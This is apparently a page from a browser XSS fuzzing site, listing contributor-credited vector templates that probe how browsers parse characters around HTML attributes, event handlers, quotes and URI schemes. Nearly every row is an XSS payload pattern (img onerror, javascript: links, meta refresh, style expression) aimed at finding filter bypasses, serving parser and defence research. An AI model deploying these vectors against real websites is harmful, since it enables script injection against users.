Featured vector
IE 11.0
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,344,426 Successful fuzzes
Fuzz Vectors
Searching for "attribute"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| form attribute support | <form id='*datahtmlelements*1'> </form> <*datahtmlelements* id='*datahtmlelements*2' form='*datahtmlelements*1'></*datahtmlelements*> <script> if (document.getElementById('*datahtmlelements*2').form == '[object HTMLFormElement]') { customLog('*datahtmlelements*') } </script> | @insertScript |
| Single characters that break attribute names | <div *chr*="><img src=xss:xss onerror=logChr(*num*)>"> | @garethheyes |
| Valid characters between attribute and value instead of | <img src=xx:xx onerror*chr*logChr(*num*)> | @blubbfiction |
| Replacement characters for between attribute and value | <img src=xx:xx onerror*chr*logChr(*num*)> | @blubbfiction |
| Characters allowed between event handlers and equal sign | <img src="about:blank" onerror*chr*=logChr(*num*)> | @peksa |
| HTML input image tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> | @peksa |
| HTML input tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> | @peksa |
| Characters allowed between and in HTML entities in style attribute | <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> | @tifkin_ |
| characters that behave like equal signs in attribute value | <img src== onerror="a*chr*logChr(*num*)"> | @JohnathanKuskos |
| Characters that dont inhibit eventhandlers | <img src=xx:xx o*chr*nerror=logChr(*num*)> | @tifkin_ |
| Characters that break attribute names | <img src=# aaa*chr*onerror="logChr(*num*)"> | @albinowax |
| Characters allowed between attributes | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @tifkin_ |
| Characters allowed within an attribute name (on()load) | "'><img src="xx:xx" on*chr*error="log(*num*);"> | @skeptic_fx |
| Characters transformed in expando attributes | <div id="fuzzelement*num*" expando*chr*="123">test</div> | @garethheyes |
| Expandos attributes characters removed | <div id="fuzzelement*num*" expando*chr*=123>test</div> | @garethheyes |
| meta refresh tag content attribute url overwrite | <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> | @olemoudi |
| Break out of HTML element from single quoted attribute | <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> | @peksa |
| Escaped characters that break out of single quote HTML attribute | <img src='xx:x\*chr* onerror="logChr(*num*)">'> | @peksa |
| Characters syntactically equivalent to double quote in HTML attributes | `"'><img src="#*chr* onerror=log(*num*)> | @p_laguna |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters allowed between tag and attribute | <script*chr*type="text/javascript">log(*num*);</script> | @0xAli |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters allowed attribute quote | "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> | @jackmasa |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters syntactically equivalent to colon in a URI | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @_cweb |
| Escape from attribute a closing tag | <a href="*chr*><script>log(*num*)</script>" /> | @shafigullin |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed before attribute name | `"'><img src=xxx:x *chr*onerror=log(*num*)> | @garethheyes |